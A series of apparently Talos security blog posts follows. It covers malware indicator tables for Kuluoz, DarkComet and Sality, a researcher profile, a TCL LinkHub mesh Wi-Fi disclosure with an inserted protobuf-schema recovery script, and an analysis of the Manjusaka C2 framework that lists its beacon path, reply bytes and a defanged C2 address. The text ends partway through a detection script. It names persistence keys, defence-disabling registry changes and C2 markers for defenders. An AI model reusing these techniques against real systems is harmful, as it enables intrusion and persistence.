Value Name: Start
97
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\MICROSOFT SHAREPOINT WORKSPACE AUDIT SERVICE
Value Name: Start
97
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\MSDTC
Value Name: Start
97
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\CLR_OPTIMIZATION_V2.0.50727_64
Value Name: Start
97
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\FAX
Value Name: ObjectName
97
<HKLM>\SOFTWARE\MICROSOFT\.NETFRAMEWORK\V2.0.50727\NGENSERVICE\STATE
Value Name: AccumulatedWaitIdleTime
97
<HKLM>\SOFTWARE\MICROSOFT\.NETFRAMEWORK\V2.0.50727\NGENSERVICE\LISTENEDSTATE
Value Name: RootstoreDirty
97
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\.NETFRAMEWORK\V2.0.50727\NGENSERVICE\STATE
Value Name: AccumulatedWaitIdleTime
97
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\.NETFRAMEWORK\V2.0.50727\NGENSERVICE\LISTENEDSTATE
Value Name: RootstoreDirty
97
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\MEDIA CENTER\SERVICE\SCHEDULER 97
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\MEDIA CENTER\SERVICE\SCHEDULER
Value Name: ServiceFailures
97
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\MEDIA CENTER\SERVICE\SCHEDULER
Value Name: ServiceStarted
97
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\MEDIA CENTER\SERVICE\SCHEDULER
Value Name: Heartbeat
97
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\MEDIA CENTER\SERVICE\SCHEDULER
Value Name: WaitingForShutdown
97
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\MEDIA CENTER\SERVICE\SCHEDULER
Value Name: HeartbeatIntervalMs
97
Mutexes Occurrences
*See JSON for more IOCs
IP Addresses contacted by malware. Does not indicate maliciousness Occurrences
Domain Names contacted by malware. Does not indicate maliciousness Occurrences
Files and or directories created Occurrences
%ProgramFiles(x86)%\Microsoft Office\Office14\GROOVE.EXE 97
%ProgramFiles(x86)%\Mozilla Maintenance Service\maintenanceservice.exe 97
%SystemRoot%\Microsoft.NET\Framework64\v2.0.50727\mscorsvw.exe 97
%SystemRoot%\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe 97
%SystemRoot%\Microsoft.NET\Framework\v2.0.50727\mscorsvw.exe 97
%SystemRoot%\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe 97
%System32%\FXSSVC.exe 97
%System32%\alg.exe 97
%System32%\dllhost.exe 97
%System32%\ieetwcollector.exe 97
%System32%\msdtc.exe 97
%System32%\msiexec.exe 97
%SystemRoot%\ehome\ehrecvr.exe 97
%SystemRoot%\ehome\ehsched.exe 97
%SystemRoot%\Microsoft.NET\Framework\v2.0.50727\ngen_service.log 97
%SystemRoot%\Microsoft.NET\Framework64\v2.0.50727\ngen_service.log 97
%SystemRoot%\Registration\{02D4B3F1-FD88-11D1-960D-00805FC79235}.{33EC2C09-9668-4DE7-BCC0-EFC69D7355D7}.crmlog 97
%SystemRoot%\Microsoft.NET\Framework64\v4.0.30319\ngen_service.log 97
%SystemRoot%\Microsoft.NET\Framework\v4.0.30319\ngen_service.log 97
%SystemRoot%\Microsoft.NET\Framework\v4.0.30319\ngenservicelock.dat 97
%SystemRoot%\Microsoft.NET\Framework64\v4.0.30319\ngenrootstorelock.dat 97
%SystemRoot%\Microsoft.NET\Framework64\v4.0.30319\ngenservicelock.dat 97
%SystemRoot%\Microsoft.NET\Framework\v2.0.50727\ngen_service.lock 97
%SystemRoot%\Microsoft.NET\Framework\v2.0.50727\ngenservicelock.dat 97
%SystemRoot%\Microsoft.NET\Framework64\v2.0.50727\ngen_service.lock 97
*See JSON for more IOCs

File Hashes

*See JSON for more IOCs

Coverage

Product Protection
Secure Endpoint This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Secure Malware Analytics This has coverage
Umbrella N/A
WSA This has coverage

Screenshots of Detection

Secure Endpoint



Secure Malware Analytics



MITRE ATT&CK


Win.Dropper.Kuluoz-9957187-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 15 samples
Registry Keys Occurrences
<HKCU>\SOFTWARE\<random, matching '[a-zA-Z0-9]{5,9}'> 15
<HKCU>\SOFTWARE\FVXBJPWU
Value Name: vcariano
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: llqjxikf
1
<HKCU>\SOFTWARE\PWWTTVLV
Value Name: twekalil
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: xxdfmerx
1
<HKCU>\SOFTWARE\EWMGTFIM
Value Name: anxufehi
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: nqrwcsef
1
<HKCU>\SOFTWARE\WFPJGFQR
Value Name: vjiwxwuh
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: wddfjook
1
<HKCU>\SOFTWARE\DRBVCKTP
Value Name: lpeeclca
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: igudfpld
1
<HKCU>\SOFTWARE\TBTCBEWS
Value Name: qbdbpkdf
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: ddgljbjp
1
<HKCU>\SOFTWARE\ATTOEKEN
Value Name: euvumrrn
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: kxadigun
1
<HKCU>\SOFTWARE\NWOLGMSD
Value Name: okhudfoo
1
<HKCU>\SOFTWARE\SXPMECNO
Value Name: vbuvphur
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: bshrfueu
1
<HKCU>\SOFTWARE\NAFNCVOV
Value Name: iatqgcgc
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: lnxhasuw
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: oxviaxao
1
<HKCU>\SOFTWARE\BPLLBGMG
Value Name: aqonboar
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: iurwprlq
1
<HKCU>\SOFTWARE\BEOHVVNC
Value Name: mujhuapl
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: qsmriksl
1
Mutexes Occurrences
aaAdministrator 15
IP Addresses contacted by malware. Does not indicate maliciousness Occurrences
Files and or directories created Occurrences
%LOCALAPPDATA%\<random, matching '[a-z]{8}'>.exe 15

File Hashes


Coverage

Product Protection
Secure Endpoint This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security N/A
Stealthwatch N/A
Stealthwatch Cloud N/A
Secure Malware Analytics This has coverage
Umbrella N/A
WSA N/A

Screenshots of Detection

Secure Endpoint



Secure Malware Analytics



MITRE ATT&CK


Win.Dropper.DarkComet-9957280-1

Indicators of Compromise

  • IOCs collected from dynamic analysis of 12 samples
Registry Keys Occurrences
<HKCU>\SOFTWARE\DC3_FEXEC 10
Mutexes Occurrences
DC_MUTEX-F75JL20 10
Files and or directories created Occurrences
%TEMP%\Crypted.exe 12

File Hashes


Coverage

Product Protection
Secure Endpoint This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security N/A
Stealthwatch N/A
Stealthwatch Cloud N/A
Secure Malware Analytics This has coverage
Umbrella N/A
WSA N/A

Screenshots of Detection

Secure Endpoint

Secure Malware Analytics

MITRE ATT&CK


Win.Trojan.Sality-9957294-1

Indicators of Compromise

  • IOCs collected from dynamic analysis of 23 samples
Registry Keys Occurrences
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\ADVANCED
Value Name: Hidden
23
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\SECURITY CENTER
Value Name: AntiVirusOverride
23
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\SECURITY CENTER
Value Name: AntiVirusDisableNotify
23
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\SECURITY CENTER
Value Name: FirewallDisableNotify
23
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\SECURITY CENTER
Value Name: FirewallOverride
23
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\SECURITY CENTER
Value Name: UpdatesDisableNotify
23
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\SECURITY CENTER
Value Name: UacDisableNotify
23
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\SECURITY CENTER\SVC
Value Name: AntiVirusOverride
23
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\SECURITY CENTER\SVC
Value Name: AntiVirusDisableNotify
23
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\SECURITY CENTER\SVC
Value Name: FirewallDisableNotify
23
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\SECURITY CENTER\SVC
Value Name: FirewallOverride
23
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\SECURITY CENTER\SVC
Value Name: UpdatesDisableNotify
23
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\SECURITY CENTER\SVC
Value Name: UacDisableNotify
23
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\SYSTEM
Value Name: EnableLUA
23
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SHAREDACCESS\PARAMETERS\FIREWALLPOLICY\STANDARDPROFILE
Value Name: EnableFirewall
23
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SHAREDACCESS\PARAMETERS\FIREWALLPOLICY\STANDARDPROFILE
Value Name: DoNotAllowExceptions
23
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SHAREDACCESS\PARAMETERS\FIREWALLPOLICY\STANDARDPROFILE
Value Name: DisableNotifications
23
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SHAREDACCESS\PARAMETERS\FIREWALLPOLICY\STANDARDPROFILE\AUTHORIZEDAPPLICATIONS\LIST
Value Name: C:\Windows\SysWOW64\msiexec.exe
23
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SHAREDACCESS\PARAMETERS\FIREWALLPOLICY\STANDARDPROFILE\AUTHORIZEDAPPLICATIONS\LIST
Value Name: C:\Windows\SysWOW64\svchost.exe
23
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER\RUN 23
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SHAREDACCESS\PARAMETERS\FIREWALLPOLICY\STANDARDPROFILE\AUTHORIZEDAPPLICATIONS\LIST 23
<HKCU>\SOFTWARE\AASPPAPMMXKVS\-993627007
Value Name: -757413758
21
<HKCU>\SOFTWARE\AASPPAPMMXKVS\-993627007
Value Name: 1011363011
21
<HKCU>\SOFTWARE\AASPPAPMMXKVS\-993627007
Value Name: -1514827516
21
<HKCU>\SOFTWARE\AASPPAPMMXKVS\-993627007
Value Name: 253949253
21
Mutexes Occurrences
uxJLpe1m 23
smss.exeM_204_ 15
<process name>.exeM_<pid>_ 3
IP Addresses contacted by malware. Does not indicate maliciousness Occurrences
Domain Names contacted by malware. Does not indicate maliciousness Occurrences
support[.]microsoft[.]com 23
updatewindows[.]net 23
Files and or directories created Occurrences
\4091535952 23
%SystemRoot%\system.ini 19

File Hashes


Coverage

Product Protection
Secure Endpoint This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Secure Malware Analytics This has coverage
Umbrella N/A
WSA N/A

Screenshots of Detection

Secure Endpoint



Secure Malware Analytics



MITRE ATT&CK

Researcher Spotlight: You should have been listening to Lurene Grenier years ago

1 August 2022 at 12:00

The exploit researcher recently rejoined Talos after starting her career with the company’s predecessor 

By Jonathan Munshaw. 

Lurene Grenier says state-sponsored threat actors keep her up at night, even after years of studying and following them.  

She’s spent her security career warning people why this was going to be a problem. 

Today if someone is compromised by a well-funded, state-sponsored actor, she is concerned but doesn’t necessarily feel sorry. After all, she’s been warning the security community about this for years. 

“You think about the phrase ‘fool me once, shame on you...’ Five years ago if we had this discussion and you were hit with an attack, you’d think ‘shame on China,’” she said. “Today, if we have that discussion about why you were hit, it’s shame on us.” 

Grenier has spent her career looking at state-sponsored actor trends and writing detection content to block those actors.

She was one of the first of the smaller research staff at the Sourcefire Vulnerability Research Team, which eventually merged with a few other teams to form Talos. Matt Watchinski, who is now the vice president of Talos, initially hired Grenier as a vulnerability exploit researcher, doing the job of what more than a dozen people do today for Talos. 

Grenier looked at vulnerability details for regular patch cycles like Microsoft Patch Tuesday and wrote her own exploit code for the vulnerabilities, which eventually fed into detection content that would block attackers’ attempts to target these issues in the wild. She grew with VRT, eventually overseeing the Analyst Team, which today is the main producer of detection content for Cisco Secure products and Snort.

She eventually took a few other paths on her security journey outside of Cisco and Talos, but recently rejoined Talos as a special advisor to Watchinski, studying state-sponsored actors and major attacker trends using Talos’ data and telemetry.  

“My main directive is to come up with plans for this mountain of data that we have,” Grenier said. “I look at the data that we do have and see what outcomes for customers we can achieve with it. Can we create something like a semi-autonomous mediation plan when there is a breach? Can we track actors in a more granular manner so we can match them with what we’ve seen in the past?” 

Even during her time away from Talos, Grenier never lost connection, speaking at two Talos Threat Research Summits that were a part of Cisco Live. In 2018, she even gave a presentation on how organizations were not taking threats from state-sponsored actors seriously enough and warned about the theft of intellectual property. Some of the same techniques and actors she warned about in that talk resurfaced earlier this year in a warning from federal agencies in the U.S. and the U.K., stating that Chinese state-sponsored actors were stealing important IP and creating fraudulent “tech transfer” agreements. 

While Grenier still tracks these same actors daily, she views their activity as more of an inevitability that's going to produce the worst-case scenario rather than anything that can be avoided at this point. 

“It’s like earthquakes or famine, it’s really just horrible,” she said. 

At this point, Grenier is focusing her work on how to make attacks as costly as possible for the adversary, rather than trying to avoid them altogether. If her research can help even slow down an actor for a bit or cost them more resources when they go to attack again, that’s a small victory to build off. 

“People have to see the cost of these breaches,” she said. “And they’re not going to see the inflection point for a while now, but it will eventually become very obvious.” 

Although she spent several years away from Talos, coming back to the organization (a few hundred more researchers later) was easy for Grenier because the company culture fostered at Sourcefire carries over today with leadership. Grenier said she most enjoys the “work smart, play hard” attitude, where she recognizes there will be some late nights and long days, but it will never be wasteful work. She also enjoys the work-life balance that her current remote role offers her and the flexibility to try new things and explore new research avenues.  

A lot of the security community, she said, is focused on selling solutions that are “plug and play” for the end user. But the difference with Talos is that our research informs users and administrators deploying Cisco Secure solutions so they understand the broader context of what our intelligence means. 

“We’re not just selling it to people who don’t understand what they’re doing in the first place,” she said. “The focus here is on doing real, impactful work, and not just thinking ‘Oh what can we do for this threat?’ At Talos, you’ll also be asked to engage your brain to do the useful thing, the thing that ought to happen.” 

Grenier tries to engage her brain in all sorts of ways even when she’s not at her desk. She enjoys playing music in her free time, specifically jazz-influenced blues music. The fast-paced, free-formed genre ties into the learning and reaction she must do in the moment as new state-sponsored actors develop new tactics and techniques. Just don’t expect her to be sharing any of these insights on Twitter any time soon. 

“Social media is the biggest mistake we have ever made,” she said.  

Fans will just have to look for Lurene at the next Talos Threat Research Summit for her next five-year prognostication, then.  

Vulnerability Spotlight: How misusing properly serialized data opened TCL LinkHub Mesh Wi-Fi system to 17 vulnerabilities

1 August 2022 at 16:18



By Carl Hurd. 

The TCL LinkHub Mesh Wi-Fi system is a multi-device Wi-Fi system that allows users to expand access to their network over a large physical area. What makes the LinkHub system unique is the lack of a network interface to manage the devices individually or in the mesh. Instead, a phone application is the only method to interact with these devices. This is noteworthy because, in theory, it significantly reduces the common attack surface on most small office/home office (SOHO) routers, as it removes the entire HTTP/S code base from the product. This means, in theory, fewer issues with integration or hacked-together scripts to trigger various functions within the device. One of the issues with this approach, though, is that the management functionality still needs to reside somewhere for the user to manage the device.

However, this setup leaves the LinkHub Mesh Wi-Fi system open to several vulnerabilities, which we are disclosing today. An attacker could exploit these vulnerabilities to carry out a variety of malicious actions, including injecting code at the operating system level, stealing credentials and causing a denial of service of the entire network. Cisco Talos is disclosing these vulnerabilities despite no official fix from TCL, all in adherence to Cisco’s vulnerability disclosure policy.

Moving all the management functionality to the phone application makes it the most interesting path to research for this device. The first step is to understand the protocol used for communication. There were a few likely options: TCL could have used HTTP with hidden endpoints, or some hand-rolled protocol, so capturing and identifying the traffic became the priority. The capture showed right away that the traffic is not HTTP or another text-based protocol, so the next step was determining whether this is a custom protocol or something more widely used.
Network traffic capture of Android application communication. 



While investigating various binaries on the device and the Android application, it became clear that the method for serializing data is the widely used Proto Buffers (Protocol Buffers) library. Proto Buffers serializes data using a platform-agnostic definition file. Once the definition file has been created, the protoc compiler can generate the boilerplate code needed for various programming languages to communicate using the defined serialization. An interesting side effect of using Proto Buffers is that the definition itself needs to be embedded in the generated code so that each side can deserialize data into a usable format for each language the compiler supports. By determining how this data is included in the deserializing code, one can recover an almost perfect representation of the definition file from the compiled binaries.

Proto Buffer structure recovered from binary. 
Proto file recovered from the binary. 

Once the proto files have been recovered, the file can be compiled to any supported language. This makes interacting with the service incredibly simple once the proto file has been extracted. The usage of Proto Buffers has another advantage for vulnerability research: The Proto Buffer serialization and deserialization are very well tested. That is not to say that it is perfect and bug-free, but for the purposes of this research, it made sense to ignore any code generated from protoc. This research was completely focused on the business logic and handling of data once it had been deserialized, all code which TCL is responsible for. 
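As an added example (not the tooling used in this research), the following script shows the recovery step on a constructed sample: it scans a binary for the serialized FileDescriptorProto that protoc-generated code embeds, walks the protobuf wire format with a schema for the three descriptor message types, and prints the result back as .proto text. The message and field names in the sample are invented and are not taken from the LinkHub firmware.

```python
import re

# Field numbers come from the public descriptor.proto; the sample binary below is constructed.
FIELD_TYPES = {5: "int32", 8: "bool", 9: "string", 11: "message", 12: "bytes", 13: "uint32"}
LABELS = {1: "optional", 2: "required", 3: "repeated"}

def read_varint(buf, pos):
    """Decode one base-128 varint at pos; return (value, next position)."""
    value = 0
    for shift in range(0, 64, 7):
        byte, pos = buf[pos], pos + 1  # IndexError on truncation is caught in walk()
        value |= (byte & 0x7F) << shift
        if not byte & 0x80:
            return value, pos
    raise ValueError("varint too long")

def walk(buf, pos=0):
    """Yield (field number, wire type, value) from pos until the bytes stop looking like
    protobuf: a zero tag, truncated data or a wire type other than varint/length-delimited
    (descriptors use no fixed-width fields) ends the walk."""
    try:
        while pos < len(buf):
            tag, pos = read_varint(buf, pos)
            number, wire_type = tag >> 3, tag & 7
            if number == 0:
                return
            if wire_type == 0:
                value, pos = read_varint(buf, pos)
            elif wire_type == 2:
                length, pos = read_varint(buf, pos)
                value, pos = buf[pos:pos + length], pos + length
                if len(value) != length:
                    return
            else:
                return
            yield number, wire_type, value
    except (IndexError, ValueError):
        return

def parse(buf, schema, pos=0):
    """Decode one message into a dict. schema maps field number -> (key, kind), where
    kind is "str", "int" or a nested schema; keys ending in "[]" collect repeated fields."""
    out = {}
    for number, wire_type, value in walk(buf, pos):
        key, kind = schema.get(number, (None, None))
        if kind == "str" and wire_type == 2:
            value = value.decode("ascii", "replace")
        elif isinstance(kind, dict) and wire_type == 2:
            value = parse(value, kind)
        elif not (kind == "int" and wire_type == 0):
            continue  # unknown field, or wire type does not match the schema
        if key.endswith("[]"):
            out.setdefault(key[:-2], []).append(value)
        else:
            out[key] = value
    return out

# FieldDescriptorProto, DescriptorProto and FileDescriptorProto, trimmed to what a .proto needs.
FIELD_SCHEMA = {1: ("name", "str"), 3: ("number", "int"), 4: ("label", "int"),
                5: ("type", "int"), 6: ("type_name", "str")}
MESSAGE_SCHEMA = {1: ("name", "str"), 2: ("fields[]", FIELD_SCHEMA)}
FILE_SCHEMA = {1: ("name", "str"), 2: ("package", "str"), 4: ("messages[]", MESSAGE_SCHEMA)}

# A serialized FileDescriptorProto opens with field 1 (tag 0x0a, length byte, .proto name).
DESCRIPTOR_START = re.compile(rb"\x0a[\x01-\x7f][\x20-\x7e]{1,120}\.proto")

def recover_descriptors(binary):
    """Find embedded descriptors and parse each one. The walk stops at the first byte that
    is not a valid tag; a production scanner should also honour the blob length that
    protoc-generated code records next to the descriptor."""
    starts = [m.start() for m in DESCRIPTOR_START.finditer(binary)
              if binary[m.start() + 1] == len(m.group()) - 2]  # length byte must fit the name
    return [fd for fd in (parse(binary, FILE_SCHEMA, s) for s in starts) if fd.get("messages")]

def render_proto(fd):
    """Turn a recovered descriptor back into .proto text."""
    lines = ['syntax = "proto2";  // recovered from ' + fd.get("name", "?")]
    if fd.get("package"):
        lines.append(f'package {fd["package"]};')
    for message in fd.get("messages", []):
        lines.append(f'\nmessage {message.get("name", "Unnamed")} {{')
        for f in message.get("fields", []):
            type_name = f.get("type_name", "").lstrip(".") or FIELD_TYPES.get(f.get("type"), "bytes")
            lines.append(f'  {LABELS.get(f.get("label"), "optional")} {type_name} '
                         f'{f.get("name", "?")} = {f.get("number", 0)};')
        lines.append("}")
    return "\n".join(lines)

# Constructed sample. The encoders assume numbers and lengths below 128 (one-byte varints).
def _ld(number, data): return bytes([number << 3 | 2, len(data)]) + data  # length-delimited
def _vi(number, value): return bytes([number << 3, value])                 # varint
_SAMPLE_DESCRIPTOR = _ld(1, b"example.proto") + _ld(2, b"example") + _ld(4, (
    _ld(1, b"WlanConfig")
    + _ld(2, _ld(1, b"ssid") + _vi(3, 1) + _vi(4, 2) + _vi(5, 9))
    + _ld(2, _ld(1, b"password") + _vi(3, 2) + _vi(4, 1) + _vi(5, 9))
    + _ld(2, _ld(1, b"channel") + _vi(3, 3) + _vi(4, 1) + _vi(5, 13))))
SAMPLE_BINARY = b"\x7fELF" + b"\x00" * 12 + _SAMPLE_DESCRIPTOR + b"\x00" * 8 + b"unrelated\x00"
```

Running `render_proto` over each result of `recover_descriptors(SAMPLE_BINARY)` prints the reconstructed message definition; on a real binary the same loop yields one block per embedded .proto file.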

The next roadblock before general security research could begin was authentication. The user does not need to provide a password in the TCL app to authenticate to the device, so the secret was either pre-negotiated upon pairing or some other information is used. After reviewing network captures with the recovered protocol information, it was clear that these devices use the serial number as the password for authentication. What is worse, the serial number can be requested (and is requested in the normal authentication flow) without any permissions, so this is not an authentication method at all. After recreating this pseudo-login method, the research could proceed to look for vulnerabilities.

During this research, 17 different vulnerability reports were generated. Each report groups similar CVEs together before it is sent to the vendor; in this case, the 17 reports cover 41 unique CVEs. Many of the discovered vulnerabilities are related to the Proto Buffer management protocol, as well as the general practice of recovering configurations from memory. For more information on each of these vulnerabilities, check out their full reports, linked below.

The following Snort rules will detect exploitation attempts against these vulnerabilities: 59013, 59020, 59026 - 59029, 59058, 59059, 59061, 59289 - 59291 and 59406 - 59411. Additional rules may be released in the future and current rules are subject to change, pending additional vulnerability information. For the most current rule information, please refer to your Firepower Management Center or Snort.org.

Buffer overflow vulnerabilities 

  • Talos-2022-1454: TCL LinkHub Mesh Wifi confsrv set_port_fwd_rule stack-based buffer overflow vulnerability 
  • Talos-2022-1455: TCL LinkHub Mesh Wifi confsrv set_mf_rule stack-based buffer overflow vulnerability 
  • Talos-2022-1456: TCL LinkHub Mesh Wifi confsrv ucloud_add_node_new stack-based buffer overflow vulnerability 
  • Talos-2022-1462: TCL LinkHub Mesh Wi-Fi confsrv confctl_set_app_language stack-based buffer overflow vulnerability 
  • Talos-2022-1463: TCL LinkHub Mesh Wifi GetValue buffer overflow vulnerability 
  • Talos-2022-1482: TCL LinkHub Mesh Wi-Fi confsrv addTimeGroup stack-based buffer overflow vulnerability 
  • Talos-2022-1483: TCL LinkHub Mesh Wi-Fi confsrv ucloud_set_node_location stack-based buffer overflow vulnerability 
  • Talos-2022-1484: TCL LinkHub Mesh Wi-Fi confsrv ucloud_set_node_location buffer overflow vulnerability 

Command injection vulnerabilities 

  • Talos-2022-1457: TCL LinkHub Mesh Wifi confsrv ucloud_add_node_new OS command injection vulnerability  
  • Talos-2022-1458: TCL LinkHub Mesh Wifi confsrv ucloud_add_node OS command injection vulnerability 

Information disclosure vulnerabilities 

  • Talos-2022-1503: TCL LinkHub Mesh Wifi confctl_get_guest_wlan information disclosure vulnerability 
  • Talos-2022-1504: TCL LinkHub Mesh Wifi confctl_get_master_wlan information disclosure vulnerability 

Denial-of-service vulnerabilities 

  • Talos-2022-1502: TCL LinkHub Mesh Wifi confctl_set_guest_wlan denial of service vulnerability 
  • Talos-2022-1505: TCL LinkHub Mesh Wifi confctl_set_master_wlan denial of service vulnerability 
  • Talos-2022-1506: TCL LinkHub Mesh Wi-Fi confctl_set_wan_cfg denial of service vulnerability 
  • Talos-2022-1507: TCL LinkHub Mesh Wifi ucloud_del_node denial of service vulnerability 

Hard-coded credential vulnerability 

  • Talos-2022-1459: TCL LinkHub Mesh Wifi libcommonprod.so prod_change_root_passwd hard-coded password vulnerability 

Manjusaka: A Chinese sibling of Sliver and Cobalt Strike

2 August 2022 at 12:00


By Asheer Malhotra and Vitor Ventura.

  • Cisco Talos recently discovered a new attack framework called "Manjusaka" being used in the wild that has the potential to become prevalent across the threat landscape. This framework is advertised as an imitation of the Cobalt Strike framework.
  • The implants for the new malware family are written in the Rust language for Windows and Linux.
  • A fully functional version of the command and control (C2), written in GoLang with a User Interface in Simplified Chinese, is freely available and can generate new implants with custom configurations with ease, increasing the likelihood of wider adoption of this framework by malicious actors.
  • We recently discovered a campaign in the wild using lure documents themed around COVID-19 and the Haixi Mongol and Tibetan Autonomous Prefecture, Qinghai Province. These maldocs ultimately led to the delivery of Cobalt Strike beacons on infected endpoints.
  • We have observed the same threat actor using the Cobalt Strike beacon and implants from the Manjusaka framework.


Introduction


Cisco Talos has discovered a relatively new attack framework, called "Manjusaka" by its authors (the name can be translated as "cow flower" from Simplified Chinese), being used in the wild.

As defenders, it is important to keep track of offensive frameworks such as Cobalt Strike and Sliver so that enterprises can effectively defend against attacks employing these tools. Although we haven't observed widespread usage of this framework in the wild, it has the potential to be adopted by threat actors all over the world. This disclosure from Talos intends to provide early notification of the usage of Manjusaka. We also detail the framework's capabilities and the campaign that led to the discovery of this attack framework in the wild.

The research started with a malicious Microsoft Word document (maldoc) that contained a Cobalt Strike (CS) beacon. The lure in this document mentioned a COVID-19 outbreak in Golmud City, one of the largest cities in the Haixi Mongol and Tibetan Autonomous Prefecture, Qinghai Province. During the investigation, Cisco Talos found no direct link between the campaign and the framework developers, aside from the usage of the framework (which is freely available on GitHub). We also could not find any data that would allow us to define the victimology. This is understandable given the low number of victims, which indicates the early stages of the campaign; the maldoc metadata, which indicates it was created in the second half of June 2022, supports this.

While investigating the maldoc infection chain, we found an implant used to instrument Manjusaka infections, contacting the same IP address as the CS beacon. This implant is written in the Rust programming language and we found samples for Windows and Linux operating systems. The Windows implant included test samples, which had non-internet-routable IP addresses as command and control (C2). Talos also discovered the Manjusaka C2 executable — a fully functional C2 ELF binary written in GoLang with a User Interface in Simplified Chinese — on GitHub. While analyzing the C2, we generated implants by specifying our own configurations. The developer advertises it as an adversary implant framework similar to Cobalt Strike or Sliver.

The developers have provided a design diagram of the Manjusaka framework illustrating the communications between the various components. A lot of these components haven't been implemented in the C2 binary available for free. Therefore, it is likely that either:

  • The framework is actively under development with these capabilities coming soon OR
  • The developer intends to or is already providing these capabilities via a service/tool to purchase - and the C2 available for free is just a demo copy for evaluation.



Manjusaka design diagram.




Manjusaka attack framework


The malware implant is a RAT family called "Manjusaka." The C2 is an ELF binary written in GoLang, while the implants are written in the Rust programming language and consist of a variety of capabilities that can be used to control the infected endpoint, including executing arbitrary commands. We discovered EXE and ELF versions of the implant. The samples for both platforms consist of almost the same set of RAT functionalities and communication mechanisms.


Communications

The sample makes HTTP requests to a fixed address, http[:]//39[.]104[.]90[.]45/global/favicon.png, with a fixed session cookie defined by the sample rather than by the server. The session cookie in the HTTP requests is base64-encoded and contains a compressed copy of binary data representing a combination of random bytes and preliminary system information used to fingerprint and register the infected endpoint with the C2. The image below shows the information used to generate such a session cookie.



The information on the cookie is arranged as described in the table below before it is compressed and encoded into base64.




The communication follows a regular pattern: the implant makes a request to a URL, which in this case is '/global/favicon.png', as seen in the image below.




Even though the request is an HTTP GET, it sends two bytes, 0x191a, as data. The reply is always the same, consisting of the five bytes 0x1a1a6e0429. This is the C2's standard reply, which does not correspond to any kind of action on the implant.

If the session cookie is not provided, the server will reply with a 302 code redirecting to http[:]//micsoft[.]com which is also redirected, this time with a 301, to http[:]//wwwmicsoft[.]com. At the time of publishing, the redirection seems like a trick to distract researchers. Talos could not find any direct correlation between the domains and the authors and/or operators of this C2.
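Putting the markers above together, here is an added detection example (not Talos code) that scores a captured request/response pair: the beacon path, the two-byte GET body, a base64 cookie that decodes to binary data, the five-byte default reply and the cookie-less 302 redirect. The cookie name "session", the host names and the traffic samples are constructed for the example.

```python
import base64
import binascii
from urllib.parse import urlsplit

# Markers taken from the analysis above; everything else in this block is constructed.
BEACON_PATH = "/global/favicon.png"
REQUEST_MARKER = bytes.fromhex("191a")              # two-byte body sent with the GET
C2_DEFAULT_REPLY = bytes.fromhex("1a1a6e0429")      # five-byte "no action" reply
REDIRECT_HOSTS = {"micsoft.com", "wwwmicsoft.com"}  # where cookie-less requests are sent

def parse_http_message(raw):
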